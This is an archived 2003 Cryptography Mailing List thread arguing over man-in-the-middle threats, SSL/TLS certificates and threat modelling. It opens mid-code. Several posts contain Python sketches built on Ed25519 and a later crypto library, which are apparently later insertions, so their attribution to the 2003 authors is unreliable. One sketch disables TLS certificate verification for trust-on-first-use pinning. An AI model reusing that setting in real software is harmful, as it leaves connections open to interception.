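customer_key = Ed25519PrivateKey.generate()
REGISTERED_KEYS = {"4111-xxxx-xxxx-1234": customer_key.public_key()}

def sign_transaction(account, payee, amount):
    # The customer signs the transaction details; the message format here
    # is purely illustrative.
    msg = ("%s|%s|%s" % (account, payee, amount)).encode()
    return msg, customer_key.sign(msg)

def bank_accepts(msg, signature):
    # The bank honours only transactions signed with the key registered to
    # the account, so a harvested account number by itself is useless.
    account = msg.split(b"|")[0].decode()
    pubkey = REGISTERED_KEYS.get(account)
    if pubkey is None:
        return False
    try:
        pubkey.verify(signature, msg)
        return True
    except InvalidSignature:
        return False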

misc. past stuff about ssl domain name certificates
http://www.garlic.com/~lynn/subpubkey.html#sslcert
misc. past stuff about relying-party-only certificates
http://www.garlic.com/~lynn/subpubkey.html#rpo
misc. past stuff about using certificateless digital signatures in radius 
authentication
http://www.garlic.com/~lynn/subpubkey.html#radius

misc. past stuff about using certificateless digital signatures in kerberos 
authentication
http://www.garlic.com/~lynn/subpubkey.html#kerberos

misc. fraud  exploits (including some number of cc related press 
announcements)
http://www.garlic.com/~lynn/subtopic.html#fraud

some discussion of early SSL deployment for what is now referred to as 
electronic commerce
http://www.garlic.com/~lynn/aadsm5.htm#asrn2
http://www.garlic.com/~lynn/aadsm5.htm#asrn3

--
Anne & Lynn Wheeler   http://www.garlic.com/~lynn/
Internet trivia 20th anv http://www.garlic.com/~lynn/rfcietff.htm
 

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


RE: SSL, client certs, and MITM (was WYTM?)

2003-10-22 Thread Tom Otvos

 Nobody doubts that it can occur, and that it *can*
 occur in practice.  It is whether it *does* occur
 that is where the problem lies.


Or, whether it gets reported if it does occur.

 The question is one of costs and benefits - how much
 should we spend to defend against this attack?  How
 much do we save if we do defend?


Absolutely true.  If the only effect of a MITM is loss of privacy, then that
is certainly a lower-priority item to fix than some quick-cash scheme.  So
the threat model needs to clearly define who the bad guys are, and what
their motivations are.  But then again, if I am the victim of a MITM attack,
even if the bad guy did not financially gain directly from the attack (as
in, getting my money or something for free), I would consider loss of
privacy a significant thing.  What if an attacker were paid by someone
(indirect financial gain) to ruin me by buying a bunch of stock on margin?
Maybe not the best example, but you get the idea.  It is not an attack that
affects millions of people, but to the person involved, it is pretty
serious.  Shouldn't the server in this case help mitigate this type of
attack?


 So, why bother with something that isn't a threat?
 Why can't we spend more time on something that *is*
 a threat, one that occurs daily, even hourly, some
 times?


I take your point, but would suggest "isn't a threat" be replaced by
"doesn't threaten the majority".  And are we at a point where it needs to
be a binary thing -- fix this OR that but NOT both?

-- tomo

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: SSL, client certs, and MITM (was WYTM?)

2003-10-22 Thread David Wagner
Tom Otvos wrote:
As far as I can glean, the general consensus in WYTM is that MITM
attacks are very low (read:
inconsequential) probability.  Is this *really* true?

I'm not aware of any such consensus.
I suspect you'd get plenty of debate on this point.
But in any case, widespread exploitation of a vulnerability
shouldn't be a prerequisite to deploying countermeasures.

If we see a plausible future threat and the stakes are high enough,
it is often prudent to deploy defenses in advance against the possibility
that attackers will exploit it.  If we wait until the attacks are widespread,
it may be too late to stop them.  It often takes years (or possibly a decade
or more: witness IPSec) to design and widely deploy effective countermeasures.

It's hard to predict with confidence which of the many vulnerabilities
will be popular among attackers five years from now, and I've been very wrong,
in both directions, many times.  In recognition of our own fallibility at
predicting the future, the conclusion I draw is that it is a good idea
to be conservative.

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: SSL, client certs, and MITM (was WYTM?)

2003-10-22 Thread Perry E. Metzger

Ian Grigg [EMAIL PROTECTED] writes:
 Nobody doubts that it can occur, and that it *can*
 occur in practice.  It is whether it *does* occur
 that is where the problem lies.
 
 The question is one of costs and benefits - how much
 should we spend to defend against this attack?  How
 much do we save if we do defend?

I have to say that I find this argument very odd.

You argue that TLS defends against man in the middle attacks, but that
we do not observe man in the middle attacks, so why do we need the
defense?

Well, we don't observe the attacks much because they are hard to
undertake. Make them easy and I am sure they would happen
frequently. Protocols subject to such attacks are frequently subjected
to them, and there are whole suites of tools you can download to help
you in intercepting traffic to facilitate them.

You argue that we have to make a cost/benefit analysis, but we're
talking about computer algorithms where the cost is miniscule if it
is measurable at all. Why should we use a second-best practice when a
best practice is in reality no more expensive?

It is one thing to argue that a bridge does not need another million
dollars worth of steel, but who can rationally argue that we should
use different, less secure algorithms when there is no obvious
benefit, either in computation, in development costs or in license
fees (since TLS is after all free of any such fees), and the
alternatives are less secure? In such a light, a cost/benefit analysis
leads inexorably to "Use TLS" -- second best saves nothing and might
cost a lot in lower security.

Some of your arguments seem to come down to "there wasn't enough
thought given to the threat model." That might have been true when the
SSL/TLS process began, but a bunch of fairly smart people worked on
it, and we've ended up with a pretty solid protocol that is at worst
more secure than you might absolutely need but which covers the threat
model in most of the cases in which it might be used. You've yet to
argue that the threat model is insufficiently secure -- only that it
might be more than one needs -- so what is the harm?

Honestly the only really good argument against TLS I can think of is
that if one wants to use something like SSH keying instead of X.509
keying the detailed protocol doesn't support it very well, but the
protocol can be trivially adapted to do what one wants and the
underlying security model is almost exactly what one wants in a
majority of cases. Such an adaptation might be a fine idea, but it can
be done without giving up any of the fine analysis that went into TLS.

Actually, there is one other argument against TLS -- it does not
protect underlying TCP signaling the way that IPSec does. However,
given where it sits in the stack, you can't fault it for that.

 I think the failure of client certs has the same
 root cause as the failure of SSL/TLS to branch
 beyond its mandated role of protecting e-
 commerce.  Literally, the requirement that
 the cert be supplied (signed) by a third party
 killed it dead.  If there had been a button on
 every browser that said "generate self-signed
 client cert now" then the whole world would be
 using them.

This is not a failure of TLS. This is a failure of the browsers and
web servers. There is no reason browsers couldn't do exactly that,
tomorrow, and that sites couldn't operate on an SSH-style "accept only what
you saw the first time" model. TLS is fully capable of supporting that.

If you want to argue against X.509, that might be a fine and quite
reasonable argument. I would happily argue against lots of X.509
myself. However, X.509 is not TLS, and TLS's properties are not those
of X.509.

-- 
Perry E. Metzger[EMAIL PROTECTED]

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: SSL, client certs, and MITM (was WYTM?)

2003-10-22 Thread Thor Lancelot Simon
On Wed, Oct 22, 2003 at 05:08:32PM -0400, Tom Otvos wrote:
 
  So what purpose would client certificates address? Almost all of the use
  of SSL domain name certs is to hide a credit card number when a consumer
  is buying something. There is no requirement for the merchant to
  identify and/or authenticate the client  the payment infrastructure
  authenticates the financial transaction and the server is concerned
  primarily with getting paid (which comes from the financial institution)
  not who the client is.
 
 
 The CC number is clearly not hidden if there is a MITM.

Can you please posit an *exact* situation in which a man-in-the-middle
could steal the client's credit card number even in the presence of a
valid server certificate?  Can you please explain *exactly* how using a
client-side certificate rather than some other form of client authentication
would prevent this?

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: SSL, client certs, and MITM (was WYTM?)

2003-10-22 Thread Perry E. Metzger

[EMAIL PROTECTED] (David Wagner) writes:
 Tom Otvos wrote:
 As far as I can glean, the general consensus in WYTM is that MITM
 attacks are very low (read:
 inconsequential) probability.  Is this *really* true?
 
 I'm not aware of any such consensus.

I will state that MITM attacks are hardly a myth. They're used by
serious attackers when the underlying protocols permit it, and I've
witnessed them in the field with my own two eyes. Hell, they're even
well enough standardized that I've seen them in use on conference
networks. Some such attacks have been infamous.

MITM attacks are not currently the primary means for stealing credit
card numbers these days, both because TLS makes it harder to do MITM
attacks and because it is usually easier just to break in to the poorly
defended web server and steal the card numbers directly. However, that
is not a reason to remove anti-MITM defenses from TLS -- it is in fact
a reason to think of them as a success.

 I suspect you'd get plenty of debate on this point.
 But in any case, widespread exploitation of a vulnerability
 shouldn't be a prerequisite to deploying countermeasures.

Indeed. Imagine if we waited until airplanes exploded regularly to
design them so they would not explode, or if we had designed our first
suspension bridges by putting up some randomly selected amount of
cabling and seeing if the bridge collapsed. That's not how good
engineering works.

 If we see a plausible future threat and the stakes are high enough,
 it is often prudent to deploy defenses in advance against the
 possibility that attackers will exploit it.

This is especially true when the marginal cost of the defenses is near
zero. The design cost of the countermeasures was high, but once
designed they can be replicated with no greater expense than that of
any other protocol.

 It's hard to predict with confidence which of the many
 vulnerabilities will be popular among attackers five years from now,
 and I've been very wrong, in both directions, many times.  In
 recognition of our own fallibility at predicting the future, the
 conclusion I draw is that it is a good idea to be conservative.

Ditto.

-- 
Perry E. Metzger[EMAIL PROTECTED]

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: SSL, client certs, and MITM (was WYTM?)

2003-10-22 Thread Ian Grigg
Tom Weinstein wrote:
 
 Ian Grigg wrote:
 
  Nobody doubts that it can occur, and that it *can* occur in practice.
  It is whether it *does* occur that is where the problem lies.
 
 This sort of statement bothers me.
 
 In threat analysis, you have to base your assessment on capabilities,
 not intentions. If an attack is possible, then you must guard against
 it. It doesn't matter if you think potential attackers don't intend to
 attack you that way, because you really don't know if that's true or not
 and they can always change their minds without telling you.

In threat analysis, you base your assessment on
economics of what is reasonable to protect.  It
is perfectly valid to decline to protect against
a possible threat, if the cost thereof is too high,
as compared against the benefits.

This is the reason that we cannot simply accept
the possible as a basis for engineering of any
form, let alone cryptography.  And this is the
reason why, if we can't measure it, then we are
probably justified in assuming it's not a threat
we need to worry about.

(Of course, anecdotal evidence helps in that
respect, hence there is a lot of discussion
about MITMs in other forums.)

iang

Here's Eric Rescorla's words on this:

http://www.iang.org/ssl/rescorla_1.html

The first thing that we need to do is define our *threat model*.
A threat model describes resources we expect the attacker to
have available and what attacks the attacker can be expected
to mount.  Nearly every security system is vulnerable to some
threat or another.  To see this, imagine that you keep your
papers in a completely unbreakable safe.  That's all well and
good, but if someone has planted a video camera in your office
they can see your confidential information whenever you take it
out to use it, so the safe hasn't bought you that much.

Therefore, when we define a threat model, we're concerned
not only with defining what attacks we are going to worry
about but also those we're not going to worry about.
Failure to take this important step typically leads to
complete deadlock as designers try to figure out how to
counter every possible threat.  What's important is to
figure out which threats are realistic and which ones we
can hope to counter with the tools available.

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: SSL, client certs, and MITM (was WYTM?)

2003-10-22 Thread Perry E. Metzger

Ian Grigg [EMAIL PROTECTED] writes:
 In threat analysis, you base your assessment on
 economics of what is reasonable to protect.  It
 is perfectly valid to decline to protect against
 a possible threat, if the cost thereof is too high,
 as compared against the benefits.

The cost of MITM protection is, in practice, zero. Indeed, if you
wanted to produce an alternative to TLS without MITM protection, you
would have to spend lots of time and money crafting and evaluating a
new protocol that is still reasonably secure without that
protection. One might therefore call the cost of using TLS, which may
be used for free, to be substantially lower than that of an
alternative.

How low does the risk have to get before you would be willing to pay
NOT to protect against it? Because that is, in practice, what
you would have to do. You would actually have to burn money to get
lower protection. The cost burden is on doing less, not on doing
more.

There is, of course, also the cost of what happens when someone MITM's
you.

You keep claiming we have to do a cost benefit analysis, but what is
the actual measurable financial benefit of paying more for less
protection?

Perry

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


RE: SSL, client certs, and MITM (was WYTM?)

2003-10-22 Thread Anne Lynn Wheeler
At 05:42 PM 10/22/2003 -0400, Tom Otvos wrote:

Absolutely true.  If the only effect of a MITM is loss of privacy, then 
that is certainly a
lower-priority item to fix than some quick cash scheme.  So the threat 
model needs to clearly
define who the bad guys are, and what their motivations are.  But then 
again, if I am the victim of
a MITM attack, even if the bad guy did not financially gain directly from 
the attack (as in, getting
my money or something for free), I would consider loss of privacy a 
significant thing. What if an
attacker were paid by someone (indirect financial gain) to ruin me by 
buying a bunch of stock on
margin?  Maybe not the best example, but you get the idea.  It is not an 
attack that affects
millions of people, but to the person involved, it is pretty 
serious.  Shouldn't the server in
this case help mitigate this type of attack?


ok, the original SSL domain name certificate for what became electronic
commerce provided:

1) am I really talking to the server that I think I'm talking to
2) encrypted session.
so the attack in #1 was plausibly some impersonation ... either MITM or
straight impersonation. The issue was that there was a perceived
vulnerability in the domain name infrastructure: somebody could
contaminate the domain name look-up and get the ip-address for the client
redirected to the impersonator.

The SSL domain name certificates carry the original domain name ... the
client validates the domain name certificate with one of the public keys in
the browser CA table ... and then validates that the server that it is
communicating with can sign/encrypt something with the private key that
corresponds to the public key carried in the certificate ... and then the
client compares the domain name in the certificate with the URL that the
browser used.  In theory, if all of that works ... then it is highly
unlikely that the client is talking to the wrong server.
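
As a rough Python sketch of those three checks (modern TLS libraries do all
of this for you; the explicit name comparison at the end is only spelled out
to mirror the description above, and it ignores wildcard certificates):

import socket
import ssl

def browser_style_check(url_host, port=443):
    # create_default_context() validates the certificate chain against the
    # local CA table and verifies the server holds the matching private key.
    ctx = ssl.create_default_context()
    ctx.check_hostname = False       # do the name comparison ourselves below
    with socket.create_connection((url_host, port)) as sock:
        with ctx.wrap_socket(sock, server_hostname=url_host) as tls:
            cert = tls.getpeercert()
    # Final step: the domain name in the certificate must match the host
    # taken from the URL the browser used (exact match only; real browsers
    # also handle wildcards).
    names = {value for key, value in cert.get("subjectAltName", ())
             if key == "DNS"}
    return url_host in names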

So what are the subsequent problems:

1) the original idea was that the whole shopping experience was protected
by the SSL domain name certificate ... preventing MITM & impersonation
attacks. However, it was found that SSL overhead was way too expensive, and
so the servers dropped back to using it just for the check-out step rather
than the whole shopping experience. This means that the client ... does all
their shopping ... with the real server or the imposter ... and then clicks
on a button to check out that drops the client into SSL for the credit card
number. The problem is that if it is an imposter ... the button likely
carries a URL for which the imposter has a valid certificate.

or

2) the original concern was possible ip-address hijacking in the domain 
name infrastructure  so the correct domain name maps to the wrong ip 
address ... and the client goes to an imposter (whether or not the
imposter needs to do an actual MITM). The problem is that when
somebody approaches a CA for a certificate  the CA has to contact the 
domain name system as to the true owner of the domain name. It turns out 
that integrity issues in the domain name infrastructure not only can result 
in ip-address take-over  but also domain name take-over. The imposter 
exploits integrity flaws in the domain name infrastructure and does a 
domain name take-over  approaches a CA for a SSL domain name 
certificate ... and the CA issues it ... because the domain name 
infrastructure claims it is the true owner.

So, somewhat from the CA industry ... there is a proposal that people
register a public key in the domain name database when they obtain a domain
name. After that ... all communication is digitally signed and validated
with the database entry public key (notice this is certificate-less). This
has the attribute of improving the integrity of the domain name
infrastructure ... so the CA industry can trust the domain name
infrastructure integrity, and so the rest of the world can trust the SSL
domain name certificates.

This has the opportunity for simplifying the  SSL domain name certificate 
requesting process. The entity requesting the SSL domain name certificate 
 digitally signs the request (certificate-less of course). The CA 
validates the SSL domain name certificate request by retrieving the valid 
owner's public key from the domain name infrastructure database to 
authenticate the request. This is a lot more efficient and has fewer
vulnerabilities than the current infrastructure.
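
A minimal sketch of that validation step, again assuming the third-party
Python "cryptography" package; the registry standing in for the domain name
database and the request format are both made up for illustration:

from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey

# Stand-in for the domain name infrastructure database: the public key the
# owner registered when the domain name was obtained (certificate-less).
owner_key = Ed25519PrivateKey.generate()
DOMAIN_DB = {"example.com": owner_key.public_key()}

def sign_cert_request(domain, csr_bytes):
    # The requester digitally signs the SSL domain name certificate request.
    return owner_key.sign(domain.encode() + b"|" + csr_bytes)

def ca_validates_request(domain, csr_bytes, signature):
    # The CA fetches the registered public key for the domain and checks the
    # signature on the request; no separate identification step is needed.
    pubkey = DOMAIN_DB.get(domain)
    if pubkey is None:
        return False
    try:
        pubkey.verify(signature, domain.encode() + b"|" + csr_bytes)
        return True
    except InvalidSignature:
        return False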

The current infrastructure has some identification of the domain name owner 
recorded in the domain name infrastructure database. When an entity 
requests a SSL domain name certificate ... they provide additional 
identification to the CA. The CA now has to retrieve the information from 
the domain name infrastructure database and map it to some real world 
identification. They then have to take the requester's information and also 
map it to 

Re: SSL, client certs, and MITM (was WYTM?)

2003-10-22 Thread Tom Weinstein
Ian Grigg wrote:

Tom Weinstein wrote:
 

In threat analysis, you have to base your assessment on capabilities,
not intentions. If an attack is possible, then you must guard against
it. It doesn't matter if you think potential attackers don't intend to
attack you that way, because you really don't know if that's true or not
and they can always change their minds without telling you.
   

In threat analysis, you base your assessment on
economics of what is reasonable to protect.  It
is perfectly valid to decline to protect against
a possible threat, if the cost thereof is too high,
as compared against the benefits.
This is the reason that we cannot simply accept
the possible as a basis for engineering of any
form, let alone cryptography.  And this is the
reason why, if we can't measure it, then we are
probably justified in assuming it's not a threat
we need to worry about.
The economic view might be a reasonable view for an end-user to take, 
but it's not a good one for a protocol designer. The protocol designer 
doesn't have an economic model for how end-users will end up using the 
protocol, and it's dangerous to assume one. This is especially true for 
a protocol like TLS that is intended to be used as a general solution 
for a wide range of applications.

In some ways, I think this is something that all standards face. For any 
particular application, the standard might be less cost effective than a 
custom solution. But it's much cheaper to design something once that 
works for everyone off the shelf than it would be to custom design a new 
one each and every time.

--
Give a man a fire and he's warm for a day, but set   | Tom Weinstein
him on fire and he's warm for the rest of his life.  | [EMAIL PROTECTED] 

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: SSL, client certs, and MITM (was WYTM?)

2003-10-22 Thread Ian Grigg
Perry E. Metzger wrote:
 
 Ian Grigg [EMAIL PROTECTED] writes:
  In threat analysis, you base your assessment on
  economics of what is reasonable to protect.  It
  is perfectly valid to decline to protect against
  a possible threat, if the cost thereof is too high,
  as compared against the benefits.
 
 The cost of MITM protection is, in practice, zero.


Not true!  The cost is from 10 million dollars to
100 million dollars per annum.  Those certs cost
money, Perry!  All that sysadmin time costs money,
too!  And all that managerial time trying to figure
out why the servers don't just work.  All those
consultants that come in and look after all those
secure servers and secure key storage and all that.

In fact, it costs so much money that nobody bothers
to do it *unless* they are forced to do it by people
telling them that they are being irresponsibly
vulnerable to the MITM!  Whatever that means.

Literally, nobody - 1% of everyone - runs an SSL
server, and even only a quarter of those do it
properly.  Which should be indisputable evidence
that there is huge resistance to spending money
on MITM.


 Indeed, if you
 wanted to produce an alternative to TLS without MITM protection, you
 would have to spend lots of time and money crafting and evaluating a
 new protocol that is still reasonably secure without that
 protection. One might therefore call the cost of using TLS, which may
 be used for free, to be substantially lower than that of an
 alternative.


I'm not sure how you come to that conclusion.  Simply
use TLS with self-signed certs.  Save the cost of the
cert, and save the cost of the re-evaluation.

If we could do that on a widespread basis, then it
would be worth going to the next step, which is caching
the self-signed certs, and we'd get our MITM protection
back!  Albeit with a bootstrap weakness, but at real
zero cost.
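
A rough sketch of that caching idea, in the spirit of SSH's known-hosts
file, might look like the following (Python standard library only; the
cache file path is invented for illustration): pin the fingerprint of
whatever cert the server presents on first contact, and complain loudly if
it ever changes.

# Sketch: trust-on-first-use caching of a (possibly self-signed) TLS cert.
# CA chain verification is deliberately switched off; the protection comes
# from remembering the fingerprint seen on the first connection.
import hashlib, json, os, socket, ssl

CACHE = os.path.expanduser("~/.tls_pins.json")   # illustrative path

def fingerprint(host: str, port: int = 443) -> str:
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE              # accept self-signed certs
    with socket.create_connection((host, port)) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            der = tls.getpeercert(binary_form=True)
    return hashlib.sha256(der).hexdigest()

def check(host: str) -> bool:
    pins = json.load(open(CACHE)) if os.path.exists(CACHE) else {}
    seen = fingerprint(host)
    if host not in pins:                         # first use: remember it
        pins[host] = seen
        json.dump(pins, open(CACHE, "w"))
        return True
    return pins[host] == seen                    # later: must not change

if __name__ == "__main__":
    print("pin ok" if check("www.example.com") else "CERT CHANGED - possible MITM")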

Any merchant who wants more, well, there *will* be
ten offers in his mailbox to upgrade the self-signed
cert to a better one.  Vendors of certs may not be
the smartest cookies in the jar, but they aren't so
dumb that they'll miss the financial benefit of self-
signed certs once it's been explained to them.

(If you mean, use TLS without certs - yes, I agree,
that's a no-win.)


 How low does the risk have to get before you will be willing not just
 to pay NOT to protect against it? Because that is, in practice, what
 you would have to do. You would actually have to burn money to get
 lower protection. The cost burden is on doing less, not on doing
 more.


This is a well known metric.  Half is a good rule of
thumb.  People will happily spend X to protect themselves
from X/2.  Not all the people all the time, but it's
enough to make a business model out of.  So if you
were able to show that certs protected us from 5-50
million dollars of damage every year, then you'd be
there.

(Mind you, where you would be is, proposing that certs
would be good to make available.  Not compulsory for
applications.)


 There is, of course, also the cost of what happens when someone MITM's
 you.


So I should spend the money.  Sure.  My choice.


 You keep claiming we have to do a cost benefit analysis, but what is
 the actual measurable financial benefit of paying more for less
 protection?


Can you take that to the specific case?

iang

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: SSL, client certs, and MITM (was WYTM?)

2003-10-22 Thread Perry E. Metzger

Ian Grigg [EMAIL PROTECTED] writes:
 Perry E. Metzger wrote:
  The cost of MITM protection is, in practice, zero.
 
 Not true!  The cost is from 10 million dollars to
 100 million dollars per annum.  Those certs cost
 money, Perry!

They cost nothing at all. I use certs every day that I've created in
my own CA to provide MITM protection, and I paid no one for them. It
isn't even hard to do.

Repeat after me:
TLS is not only for protecting HTTP, and should not be mistaken for "https:".
TLS is not X.509, and should not be mistaken for X.509.
TLS is also not "buy a cert from Verisign", and should not be
mistaken for "buy a cert from Verisign".

TLS is just a pretty straightforward well analyzed protocol for
protecting a channel -- full stop. It can be used in a wide variety of
ways, for a wide variety of apps. It happens to allow you to use X.509
certs, but if you really hate X.509, define an extension to use SPKI
or SSH style certs. TLS will accommodate such a thing easily. Indeed, I
would encourage you to do such a thing.
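
For what it's worth, a roll-your-own CA certificate really does cost
nothing but CPU time. A minimal sketch with the Python cryptography
package might look like the following -- just the self-signed root, not a
hardened CA, and the names and lifetimes are arbitrary.

# Sketch: mint a self-signed CA certificate locally, at zero cost.
import datetime
from cryptography import x509
from cryptography.x509.oid import NameOID
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import rsa

key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
name = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "my private CA")])

cert = (
    x509.CertificateBuilder()
    .subject_name(name)
    .issuer_name(name)                            # self-signed: issuer == subject
    .public_key(key.public_key())
    .serial_number(x509.random_serial_number())
    .not_valid_before(datetime.datetime.utcnow())
    .not_valid_after(datetime.datetime.utcnow() + datetime.timedelta(days=3650))
    .add_extension(x509.BasicConstraints(ca=True, path_length=None), critical=True)
    .sign(key, hashes.SHA256())
)

open("my_ca.pem", "wb").write(cert.public_bytes(serialization.Encoding.PEM))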

Perry

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: WYTM?

2003-10-21 Thread Werner Koch
On Tue, 21 Oct 2003 15:02:14 +1300, Peter Gutmann said:

 Are there any known servers online that offer X.509 (or PGP) mechanisms in
 their handshake?  Both ssh.com and VanDyke are commercial offerings so it's
 not possible to look at the source code to see what they do, and I'm not sure

Joel N. Weber II developed PGP patches for OpenSSH:

http://www.red-bean.com/~nemo/openssh-gpg/

and I am pretty sure that he has a server up somewhere. 


  Werner

-- 
Werner Koch  [EMAIL PROTECTED]
The GnuPG Expertshttp://g10code.com
Free Software Foundation Europe  http://fsfeurope.org

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: WYTM?

2003-10-20 Thread Peter Gutmann
Thor Lancelot Simon [EMAIL PROTECTED] writes:

I believe the VanDyke implementation also supports X.509, and interoperates
with the ssh.com code.  It was also my perception that, at the time, the
VanDyke guy was basically shouted down when trying to discuss the utility of
X.509 for this purpose and put his marbles back in his cloth sack and went
home.

Are there any known servers online that offer X.509 (or PGP) mechanisms in
their handshake?  Both ssh.com and VanDyke are commercial offerings so it's
not possible to look at the source code to see what they do, and I'm not sure
that I want to run the gauntlet of getting some sample copy of a commercial
app (if they're available) and figuring out how to set it up to work with
certs just to see what the data format is supposed to be...

Peter.

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: WYTM?

2003-10-19 Thread Damien Miller
On Sun, 2003-10-19 at 00:47, Peter Gutmann wrote:

 What was the motive for adding lip service into the document?
 
 So that it's possible to claim PGP and X.509 support if anyone's interested in
 it.  It's (I guess) something driven mostly by marketing so you can answer
 Yes to any question of Do you support x.  You can find quite a number of
 these things present in various security specs, it's not just an SSH thing.

I think that you are misrepresenting the problem a little. At 
least one vendor (ssh.com) has a product that supports both X.509 
and PGP, so the inclusion of these in the I-D is not just marketing 
overriding reality - just a lack of will on the part of the draft's
authors. 

I have seen little involvement on the secsh wg mailing list by 
the ssh.com people since the public spat about trademark rights 
over ssh a few years back. Since no one else implements these two 
public key methods, the work has never been done. IIRC the wg 
decided to punt the issue to a separate draft if it ever arose
again. It hasn't in two years. 

In the meantime, everyone involved seems to have become deathly 
afraid of touching the draft so as not to impede its glacial 
progress through the IETF on its way to RFC-hood.

Whether a sizeable number of customers actually use certificates 
for ssh is another matter. IMO the only real use for certs in ssh 
is the issue of initial server authentication. 

If one wants to use certificates to facilitate this process, they 
can already - just publish the server keys on a https server 
somewhere and/or sign them with PGP :)
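
One possible shape of that, sketched in Python: compute the OpenSSH-style
SHA256 fingerprint of the server's public key locally and compare it with
a fingerprint the operator has published over HTTPS. The URL and file
names here are invented for the example.

# Sketch: verify an SSH host key against a fingerprint published over HTTPS.
# Assumes the operator publishes the "SHA256:..." fingerprint at a known URL.
import base64, hashlib, urllib.request

def openssh_sha256_fingerprint(pubkey_line: str) -> str:
    # A public key line looks like: "ssh-ed25519 AAAAC3Nza... comment"
    blob = base64.b64decode(pubkey_line.split()[1])
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")

local = openssh_sha256_fingerprint(open("server_host_key.pub").read())
published = urllib.request.urlopen(
    "https://example.org/ssh-fingerprint.txt").read().decode().strip()

print("host key matches published fingerprint" if local == published
      else "MISMATCH - do not trust this host key")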

-d


-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: WYTM?

2003-10-18 Thread Peter Gutmann
Damien Miller [EMAIL PROTECTED] writes:

The SSH protocol supports certificates (X.509 and OpenPGP), though most
implementations don't.

One of the reasons why many implementations may not support it is that the spec
is completely ambiguous as to the data formats being used.  For example it
specifies the signature blob format as an X.509 signature, which could be
about half a dozen different things.  Same with PGP signatures, for which
there are even more possibilities.  In addition since almost nothing implements
them, it's not possible to get test data from someone else's server to see
what they're doing (hmm, and even if there was there's no way to tell whether
their interpretation would match someone else's).

Peter.

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: WYTM?

2003-10-17 Thread John S. Denker
On 10/16/2003 07:19 PM, David Honig wrote:

 it would make sense for the original vendor website (eg Palm)
 to have signed the MITM site's cert (palmorder.modusmedia.com),
 not for Verisign to do so.  Even better, for Mastercard to have signed
 both Palm and palmorder.modusmedia.com as well.  And Mastercard to
 have printed its key's signature in my monthly paper bill.
Bravo.  Those are golden words.

Let me add my few coppers:

1) This makes contact with a previous thread wherein
the point was made that people often unwisely talk
about identities when they should be talking about
credentials aka capabilities.
I really don't care about the identity of the
order-taking agent (e.g. palmorder.modusmedia.com).
What I want to do is establish the *credentials*
of this *session*.  I want a session with the
certified capability to bind palm.com to a
contract, and the certified capability to handle
my credit-card details properly.
2) We see that threat models (as mentioned
in the Subject: line of this thread), while
an absolutely vital part of the story, are
not the whole story.  One always needs a
push-pull approach, documenting the good
things that are supposed to happen *and* the
bad things that are supposed to not happen
(i.e. threats).
3) To the extent that SSL focuses on IDs rather
than capabilities, IMHO the underlying model has
room for improvement.
4a) This raises some user-interface issues.  The
typical user is not a world-class cryptographer
and may not have a clear idea just what ensemble
of credentials a given session ought to have.
This is not a criticism of credentials;  the user
doesn't know what ID the session ought to have
under the current system, as illustrated by the
Palm example.  The point is that if we want
something better than what we have now, we have
a lot of work to do.
4b) As a half-baked thought:  One informal intuitive
notion that users have is that if a session displays
the MasterCard *logo* it must be authorized by
MasterCard.  This notion is enforceable by law
in the long run.  Can we make it enforceable
cryptographically in real time?  Perhaps the CAs
should pay attention not so much to signing domain
names (with some supposed responsibility to refrain
from signing abusively misspelled names e.g.
pa1m.com) but rather more to signing logos (with
some responsibility to not sign bogus ones).
Then the browser (or other user interface) should
verify -- automatically -- that a session that
wishes to display certain logos can prove that
it is authorized to do so.  If the logos check
out, they should be displayed in some distinctive
way so that a cheap facsimile of a logo won't be
mistaken for a cryptologically verified logo.
Even if you don't like my half-baked proposal (4b)
I hope we can all agree that the current ID-based
system has room for improvement.
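
To make (4b) slightly less half-baked, here is a sketch of the mechanics,
assuming some authority's verification key is already baked into the
browser; every name and format below is invented purely for illustration.

# Sketch of the logo-signing idea: an authority signs (logo hash, domain),
# and the UI only renders the "verified" logo if the proof checks out.
import hashlib
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives.asymmetric import ed25519

authority_key = ed25519.Ed25519PrivateKey.generate()   # e.g. a card brand's signing key
authority_pub = authority_key.public_key()             # assumed baked into the browser

def issue_logo_credential(logo_png: bytes, domain: str) -> bytes:
    claim = hashlib.sha256(logo_png).hexdigest().encode() + b"|" + domain.encode()
    return authority_key.sign(claim)

def browser_accepts(logo_png: bytes, domain: str, proof: bytes) -> bool:
    claim = hashlib.sha256(logo_png).hexdigest().encode() + b"|" + domain.encode()
    try:
        authority_pub.verify(proof, claim)
        return True           # render as a cryptographically verified logo
    except InvalidSignature:
        return False          # render as an ordinary, unverified image

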